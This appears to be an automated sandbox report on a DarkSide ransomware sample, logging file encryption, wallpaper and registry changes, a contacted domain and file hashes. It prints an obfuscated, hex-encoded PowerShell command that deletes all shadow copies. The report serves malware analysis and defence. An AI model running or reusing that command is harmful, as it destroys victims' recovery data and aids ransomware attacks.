Analysis Overview
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
Threat Level: Known bad
The file PurchaseOrderPoster.bin was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
UPX packed file
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
Modifies Control Panel
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-10-05 10:44
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2021-10-05 10:44
Reported
2021-10-05 10:48
Platform
win7-en-20210920
Max time kernel
145s
Max time network
147s
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\CompareJoin.raw => C:\Users\Admin\Pictures\CompareJoin.raw.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareJoin.raw.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\EnterRevoke.raw.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\HideReceive.tiff | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ProtectWatch.crw.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WaitSelect.tiff | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WaitSelect.tiff.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\EnterRevoke.raw => C:\Users\Admin\Pictures\EnterRevoke.raw.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\HideReceive.tiff => C:\Users\Admin\Pictures\HideReceive.tiff.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\HideReceive.tiff.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ProtectWatch.crw => C:\Users\Admin\Pictures\ProtectWatch.crw.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WaitSelect.tiff => C:\Users\Admin\Pictures\WaitSelect.tiff.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\253a1e83.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\253a1e83.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.253a1e83\ = "253a1e83" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\253a1e83\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\253a1e83 | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\253a1e83\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\253a1e83.ico" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1144 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1144 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1144 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1144 wrote to memory of 840 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe
"C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 29.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.1.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.1.127.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
Files
memory/1144-53-0x0000000075B11000-0x0000000075B13000-memory.dmp
memory/840-54-0x0000000000000000-mapping.dmp
memory/840-55-0x000007FEFC011000-0x000007FEFC013000-memory.dmp
memory/840-56-0x000007FEF2C70000-0x000007FEF37CD000-memory.dmp
memory/840-57-0x00000000025C0000-0x00000000025C2000-memory.dmp
memory/840-58-0x00000000025C2000-0x00000000025C4000-memory.dmp
memory/840-59-0x00000000025C4000-0x00000000025C7000-memory.dmp
memory/840-60-0x00000000025CB000-0x00000000025EA000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b8f2cd7772df9edf21d1b6fd2bc52bf4 |
| SHA1 | 81e46606eebe5394ed282ff40dd71c2ba73462d9 |
| SHA256 | 089cbcae71f704ae3894d657b9feaf3a5f9b4c98fd3e1522a422d906cadbc209 |
| SHA512 | f2e00d181ef189eb042c79ecb4eb8158ca7a80e28722f1ea513f59a0153626660698cea89637a3b3e4d851d2ea29ede87f3550c46c7bf3ce5e09bd52cc5a99c4 |
Analysis: behavioral2
Detonation Overview
Submitted
2021-10-05 10:44
Reported
2021-10-05 10:48
Platform
win10v20210408
Max time kernel
151s
Max time network
65s
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\ResumeWait.tiff.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SuspendCompare.raw.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\AssertLimit.png.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DismountSelect.crw.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResumeWait.tiff => C:\Users\Admin\Pictures\ResumeWait.tiff.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InitializeMount.tif.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResumeWait.tiff | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SuspendCompare.raw => C:\Users\Admin\Pictures\SuspendCompare.raw.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\AssertLimit.png => C:\Users\Admin\Pictures\AssertLimit.png.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DismountSelect.crw => C:\Users\Admin\Pictures\DismountSelect.crw.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InitializeMount.tif => C:\Users\Admin\Pictures\InitializeMount.tif.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Reads user/profile data of web browsers
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\21b2020d.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\21b2020d.BMP" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\Desktop\WallpaperStyle = "10" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Modifies registry class
